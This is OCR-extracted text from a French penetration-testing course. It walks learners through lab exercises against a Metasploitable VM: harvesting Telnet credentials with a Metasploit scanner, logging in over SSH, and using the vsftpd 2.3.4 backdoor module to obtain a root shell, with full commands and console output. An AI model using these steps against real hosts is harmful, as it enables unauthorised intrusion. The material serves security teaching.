Il est également possible de générer des rapports d'examen de risques et de vulnérabilités en cliquant sur le bouton Report. 


Generate Report 


Report Format: HTML @ PDF CSV 
Select a Report Template: 


Template Description: 
= mne, T lr c 
Complete List of Vulnerabilities by Host be p a summary list of vulnerabilities for each host 
Detailed Vulnerabilities By Host . — 
Detailed Vulnerabilities By Plugin 
Vulnerability Operations 


Filters Applied: 
None 


Formatting Options: 


of Inciude page breaks between vulnerability results 


+ 
— 
[= 
< 
a. 


Save as default 
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EXPLOITATION DES FAILLES RELATIVES AU 
PROTOCOLE TELNET 


Compétences visées : 


Exploiter certaines failles identifiées pour mener des 
scénarios d'attaques 


Recommandations clés : 


Maitriser le principe du test d’intrusion 


KO 


OFPPT 


La Vote de l'Avenir 


WEBF 


BE 


ORCE > 


THE CHANGE SF 


CONSIGNES 


Pour le formateur 


Vapprenant doit être capable d’utiliser la console msfconsole de Kali Linux ainsi que 
le rapport de vulnérabilité généré par Nessus pour mener une attaque de sécurité 
visant la machine victime Metasploitable qui exploite une vulnérabilité précise 
(vulnérabilité relatif au protocole Telnet dans cette activité) 


Pour l’apprenant 


Il est recommandé de maitriser les notions de base de test d’intrusion et connaitre 
les attaques de sécurités ainsi que les failles de sécurité les plus courantes 


Il est également recommandé de suivre les étapes décrites dans l'énoncé 


Il faut utiliser les commandes fournies dans l’activité 


Conditions de réalisation : 


VirtualBox installé 
Deux machines Virtuelles : Kali Linux 2022.1 et Metasploitable 


Activité 1 réalisée avec succès 


Critères de réussite : 


Scouvrir av UCCÈ identifi esau ine victi 
Découvrir avec succès les identifiants d’accés a une machine victime 


Avoir un accès privilégié à la machine victime 


Activité 2 %O WEBFORCE » 
Exploitation des failles relatives au protocole Telnet 


e L'objectif de cette activité est d'exploiter l’une des vulnérabilités identifiée précédemment avec Nessus. 


e Dans cette activité, nous adressons les vulnérabilités relatifs au protocole Telnet. En examinant le rapport générée par Nessus, nous pouvons remarquer qu’une 
vulnérabilité relatif au protocole Telnet est classée comme risque moyen avec une valeur 5.8 comme illustré dans la figure ci-dessous. 


5.8 Unencrypted Telnet Server 


e En examinant les détails de cette vulnérabilité, nous pouvons noter que la vulnérabilité est que « L'hôte distant exécute un serveur Telnet sur un canal non chiffré » 


e En effet, l'utilisation de Telnet sur un canal non crypté n'est pas recommandée car les identifiants, les mots de passe et les commandes sont transférés en texte 
clair. Cela permet à un attaquant distant d'espionner une session Telnet pour obtenir des informations d'identification ou d'autres informations sensibles. 


Unencrypted Telnet Server Plugin Details 


Severity. Medium 


Description 
42263 


The remote host is running a Telnet server over an unencrypted channel 
Version 114 


Using Teinet over an unencrypted channel is not recommended as logins, passwords, and commands are transferred in cleartext. This allows è Type remote 


remote, man-in-the-middle attacker to eavesdrop on a Telnet session to obtain credentials or other senstive information and to modify traffic Family Moc 


exchanges between a client and server. 
£ Published: October 27, 2009 


= n A Modified une 12, 2020 
SSH is preferred over Telnet since it protects credentials from eavesdropping and can tunnel additional data streams such as an X11 session J 


Solution Risk Information 


Disable the Telnet service and use SSH instead. 
Risk Factor: Medium 


+ 
= 
[= 
< 
A- 


e Par conséquent, l'objectif est d'exploiter cette vulnérabilité pour identifier les informations d'identification et obtenir par la suite un accès privilégié à ce système. 
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Exploitation des failles relatives au protocole Telnet 


e Pour exploiter la vulnérabilité telnet, il suffit de réaliser les tâches suivantes : 

Lancez Metasploit on Kali en exécutant la commande sudo msfconsole ; 

Vérifiez l'existence du module d'exploitation de telnet en exécutant dans la console msfconsole la commande : search telnet_ version ; 
Utilisez l'exploit identifié en exécutant dans la console msf la commande suivante : use auxiliary/scanner/telnet/telnet_version ; 


Essayez d'identifier les options d'exploitations disponibles à l'aide de la commande suivante : show options ; 


y PF © DR À 


Nous pouvons remarquer que RHOSTS est vide, nous devons donc définir l'adresse IP cible (c'est-à-dire l'adresse IP de l'hôte victime qui est dans cet exemple 
192.168.1.8) pour permettre l'analyse de la version telnet. Pour ce faire, tapez la commande : set RHOST @IP_victim ; 


6. Exécutez maintenant le scanner telnet à l'aide de la commande run ; 


7. Déterminez les informations d'identification à partir du résultat du scan. 


e Pour bénéficier d’un accès privilégié, essayez de vous connecter à la machine victime via le service ssh en utilisant le login et le mot de passe découverts. 
8. Exécutez dans le terminal Kali la commande suivante : sudo ssh login@IP_victim ; 
9. Ayant un accès privilégiés à la machine victime, essayez d'exécuter certaines commandes tel que : 


e ifconfig 


q 
= 
= 
< 
a 


° uname -a 
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Correction 


1. Cette figure illustre le lancement de la console msfconsole dans le terminal Kali 


wake D, Neo bole 
the matrix has you 
follow the white rabbit. 


knock, knock, Neo 
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Correction 


2. Cette figure illustre l'exécution de la commande search telnet_version. Le résultat fourni montre la possibilité de l’utilisation du module 
auxiliary/scanner/telnet/telnet_version 


msf6 > search telnet_version 


Matching Modules 


Name Disclosure Date Rank Check Description 


normal No Lantronix Telnet Service Banner Detection 
normal No Telnet Service Banner Detection 


Cette figure illustre l'exécution des commandes use auxiliary/scanner/telnet/telnet_version et show options. 


> use auxiliary/scanner/telnet/telnet_version 
6 auxiliary(scanner/telnet/telnet_version) > show options 


Module options (auxiliary/scanner/telnet/telnet_version): 


Name Current Setting Required Description 


PASSWORD no The password for the specified username 

RHOSTS The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit 
RPORT 2 The target port (TCP) 

THREADS The number of concurrent threads (max one per host) 

TIMEOUT Timeout for the Telnet probe 

USERNAME The username to authenticate as 


q 
= 
= 
< 
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Correction 


Cette figure illustre l’exploitation de la vulnérabilité en exécutant les commandes set RHOSTS 192.168.1.8 et run. Le résultat obtenu est la découverte des informations 
d'identification de la machine victime qui sont : login = msfadmin et mot de passe = msfadmin 


) .x0a 


taspLoit.com\x®@ 


hosts 


)>f 


+ 
= 
= 
< 
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Correction 


Pour se connecter à la machine victime il suffit d'exécuter la commande 
sudo ssh msfadmin@ 192.168.1.8 et fournir comme mot de passe 
msfadmin 


sudo msfadmind192.168.1.8 
The authenticity of host '192.168.1.8 (192.168.1.8)' can't be established. 
RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLUVscegPXLQOsuPs+E9d/rrJB84rk. 
This host key is known by the following other names/addresses: 
~/.ssh/known_hosts:1: [hashed name] 
Are you sure you want to continue connecting (yes/no/[fingerprint])? y 
Please type ‘yes’, ‘no’ or the fingerprint: yes 
Warning: Permanently added ‘192.168.1.8' (RSA) to the List of known hosts. 
msfadming192.168.1.8's password: 
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 


The programs included with the Ubuntu system are free software; 
the exact distribution terms for each program are described in the 


individual files in /usr/share/doc/*/copyright. 


Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by 
applicable law. 


To access official Ubuntu documentation, please visit: 
http://help.ubuntu.com/ 

No mail. 

Last login: Thu Mar 24 07:07:28 2022 
msfadmin@metaspLoitable:~$ 0 


Tapez 


msfadminam 
ethd 


msfadminam 
Linux meta 
msfadminam 
vulnerable 
ms fadminam 
Logout 

Connection 
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ensuite les commandes ifconfig et uname -a dont les résultats prouvent 
que vous avez un accès privilégié à la machine Metasploitable 


etasploitable:~$ ifconfig 

Link encap:Ethernet HWaddr 08:00:27:22:b9:44 

inet addr:192.168.1.8 Bcast:192.168.1.255 Mask:255.255.255.0 
inet6 addr: fda8:c83a:5a1c:2f00:a00:27ff:fe22:b944/64 Scope:Global 
inet6 addr: fe80::a00:27ff:fe22:b944/64 Scope:Link 

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 

RX packets:38357 errors:0 dropped:@ overruns:0 frame:0 

TX packets:21264 errors:@ dropped:@ overruns:0 carrier:0 
collisions:0 txqueuelen:1000 

RX bytes:5006241 (4.7 MB) TX bytes:8417705 (8.0 MB) 

Base address:0xd020 Memory :f0200000-f0220000 


Link encap:Local Loopback 

inet addr:127.0.0.1 Mask:255.0.0.0 

inet6 addr: ::1/128 Scope:Host 

UP LOOPBACK RUNNING MTU:16436 Metric:1 

RX packets:921 errors:0@ dropped:@ overruns:@ frame:0@ 
TX packets:921 errors:@ dropped:@ overruns:@ carrier:0@ 
collisions:@ txqueuelen:0@ 

RX bytes:425833 (415.8 KB) TX bytes:425833 (415.8 KB) 


etasploitable:-$ uname -a 
sploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux 
etasploitable:-$ ls 


etasploitable:-$ exit 


to 192.168.1.8 closed. 
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EXPLOITATION DES FAILLES RELATIVES AU 
PROTOCOLE FTP 


Compétences visées : 


Exploiter certaines failles identifiées pour mener des 
scénarios d'attaques 


Recommandations clés : 


Maitriser le principe du test d’intrusion 
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CONSIGNES 


Pour le formateur 


Vapprenant doit être capable d’utiliser la console msfconsole de Kali Linux ainsi que 
le rapport de vulnérabilités généré par Nessus pour mener une attaque de sécurité 
visant la machine victime Metasploitable qui exploite une vulnérabilité précise 
(vulnérabilité relative au protocole FTP dans cette activité) 


Pour l’apprenant 


Il est recommandée de maitriser les notions de base de test d’intrusion et connaitre 
les attaques de sécurités ainsi que les failles de sécurités les plus courantes 


Il est également recommandé de suivre les étapes décrites dans l'énoncé 


Il faut utiliser les commandes fournies dans l’activité 


Conditions de réalisation : 
VirtualBox installé 
Deux machines Virtuelles : Kali Linux 2022.1 et Metasploitable 


Activité 1 réalisée avec succès 


Critères de réussite : 
Configurer et installer un backdoor dans la machine victime avec succès 


Obtenir un accès privilégié à la machine victime 


Activité 3 QO WEBFORCE 
Exploitation des failles relatives au protocole FTP 
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Exploitation des failles relatives au protocole FTP 


e L'objectif de cette activité est d'exploiter l’une des vulnérabilités identifiées dans l’activité 1 avec Nessus. 


e Dans cette activité, nous adressons une parmi les vulnérabilités relatives au protocole FTP. En examinant le rapport générez par Nessus, nous pouvons remarquer 
qu’une vulnérabilité relative au protocole FTP est identifiée comme illustré dans la figure ci-dessous. 


| ONO | - 2 FTP (Multiple Issues) Service detection 3 


e En examinant les détails de cette vulnérabilité, nous pouvons noter que la vulnérabilité est que «Il est possible d'obtenir la bannière du serveur FTP distant en se 
connectant à un port distant » 


e La vulnérabilité consiste à la présence d’un backdoor (une porte dérobée) malveillant qui a été ajouté au téléchargement VSFTPD archiver (vsftpd-2.3.4.tar.gz) 


BR FP Server Detection Plugin Details 


Description Severity nfo 
tis possible to obtain the banner of the remote FTP server by connecting to a remote port D 10092 
Version: 1.56 

Type: remote 


Output E . 
Family: Service detection 


Published: October 12, 1999 
Moditied: November 22, 2019 


The semote FTP bannez is : 
230 (verted 3.2.4) 


Port . Hosts Risk Information 
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Risk Factor: None 


192.168.1.8 


e Par conséquent, l'objectif est d'exploiter cette vulnérabilité pour bénéficier d’un accès privilégiés au système victime. 
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Exploitation des failles relatives au protocole FTP 


e Pour exploiter la vulnérabilité identifiée précédemment, il suffit de réaliser les tâches suivantes : 
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Lancez Metasploit on Kali en exécutant la commande sudo msfconsole ; 

Vérifiez l'existence du module d'exploitation de VSFTPD en exécutant dans la console msfconsole la commande : search vsftpd ; 
Utilisez l'exploit identifié en exécutant dans la console msf la commande suivante : use exploit/unix/ftp/vsftpd_234_backdoor ; 
Essayez d'identifier les options d'exploitations disponibles à l'aide de la commande suivante : show options ; 


Nous pouvons remarquer que RHOSTS est vide, nous devons donc définir l'adresse IP cible (c'est-à-dire l'adresse IP de l'hôte victime qui est dans cet exemple 
192.168.1.8). Pour ce faire, tapez la commande : set RHOST @IP_victim ; 


Affichez les modules liés aux types de payloads en exécutant la commande suivante : show payloads ; 
e Un payload est un code qui s'exécutera après s'être introduit dans la machine victime, par exemple pour avoir accès à un shell distant. 


À partir des options affichées, nous pouvons remarquer que nous ne pouvons définir que le payload du module cmd/unix/interact, comme suit : set payload 
cmd/unix/interact ; 


Après avoir configuré votre backdoor, vous pouvez l'exploiter à l'aide de la commande suivante : exploit 


En exploitant le backdoor, vous obtenez un accès privilégié à l'hôte victime et recevez un shell de commande à distance. Pour obtenir plus d'informations sur 
l'hôte victime, essayez de taper les commandes suivantes : 


e° uname -a 


e whoami 
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1. Cette figure illustre le lancement de la console msfconsole dans le terminal Kali 


post 


ds - 45 encoders - 10 nops 
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Cette figure illustre l'exécution de la commande search vsftpd. Le résultat fournit montre la possibilité de l’utilisation du module /unix/ftp/vsftpd_234_backdoor. Elle 
illustre également l'exécution des use exploit/unix/ftp/vsftpd_234_ backdoor et show options. 


msf6 > search vsftpd 


Matching Modules 


# Name Disclosure Date Rank Check Description 


© exploit/unix/ftp/WSttpd 234 backdoor 2011-07-03 No VSFTPD v2.3.4 Backdoor Command Execution 


Interact with a module by name or index. For example 


> 
> use exploit/unix/ftp/vsftpd_234 backdoor 


+ 
= 
= 
< 
a 


Activité 3 OO WEBFORCE 


i OFPPT pE THE CHANGE 
Correction as 


Correction 
Cette figure illustre l'exécution des commandes use exploit/unix/ftp/vsftpd_234_backdoor et show options. 


msf6 > use exploit/unix/ftp/vsftpd_234 backdoor 
No payload configured, defaulting to cmd/unix/interact 
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options 


Module options (exploit/unix/ftp/vsftpd_234 backdoor ): 


Name Current Setting Required Description 
RHOSTS yes The target host(s), see https://githu 
b.com/rapid7/metaspLoit-framework/wik 
i/Using-MetaspLoit 
The target port (TCP) 


Payload options (cmd/unix/interact): 


Name Current Setting Required Description 


Exploit target: 


Id Name 
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Q Automatic 
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Cette figure illustre l'exécution des commandes set RHOST 192.168.1.8 et show payloads. Le résultat obtenu montre la possibilité d’utilisation du payload 
/cmd/unix/interact 


msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.1.8 
RHOST => 192.168.1.8 
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads 


Compatible Payloads 


Name Disclosure Date Rank Check Description 


pay Load/cmd/unix/interact normal No Unix Command, Interact with Established Connection 


Cette figure illustre la configuration du payload déterminé en exécutant la commande set payload /cmd/unix/interact et son exploitation en exécutant la commande 
exploit. Le résultat obtenu est un accès privilégié à la machine victime. 


msf6 exploit(unix/{tp/vsftpd 224 backdoor) > set payload /cmd/unix/interact 
payload = cmd/unix/interact 
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit 


192.168 


- 21 - Banner: 220 (vsFTPd 2.3.4) 
192.168. 


8: 
8:21 USER: 331 Please specify the password. 

8:21 Backdoor service has been spawned, handling... 
8: 

l 


q 
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192.168 
192.168 
Found shell. 


UID: uid=0(root) gid=0(root) 
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Cette figure illustre l'exécution des commandes uname -a ,\whoami, et ifconfig dont les résultats prouvent que vous avez un accès privilégié à la machine Metasploitable 


Command shell session 1 opened (192.168.1.7:39069 — 192.168.1.8:6200 ) at 2022-03-24 13:12:34 -0400 


uname -a 
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux 
whoami 
root 
ifconfig 
eth@ Link encap:Ethernet HWaddr @8:00:27:22:b9:44 

inet addr:192.168.1.8 Bcast:192.168.1.255 Mask:255.255.255.0 

inet6 addr: fda8:c83a:5a1c:2f00:a00:27ff:fe22:b944/64 Scope:Global 

inet6 addr: fe80::a00:27ff:fe22:b944/64 Scope:Link 

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 

RX packets:44051 errors:@ dropped:® overruns:@ frame:0 

TX packets:21360 errors:@ dropped:@ overruns:@ carrier:@ 

collisions:@ txqueuelen:1000 

RX bytes:5837241 (5.5 MB) TX bytes:8431624 (8.0 MB) 

Base address:0xd020 Memory: £0200000-f0220000 


Link encap:Local Loopback 

inet addr:127.0.0.1 Mask:255.0.0.0 

inet6 addr: ::1/128 Scope:Host 

UP LOOPBACK RUNNING MTU:16436 Metric:1 

RX packets:1350 errors:@ dropped:@ overruns:@ frame:0 
TX packets:1350 errors:@ dropped:@ overruns:@ carrier:@ 
collisions:0 txqueuelen:@ 

RX bytes:636253 (621.3 KB) TX bytes:636253 (621.3 KB) 
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exit 
192.168.1.8 - Command shell session 1 closed. 
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > J 


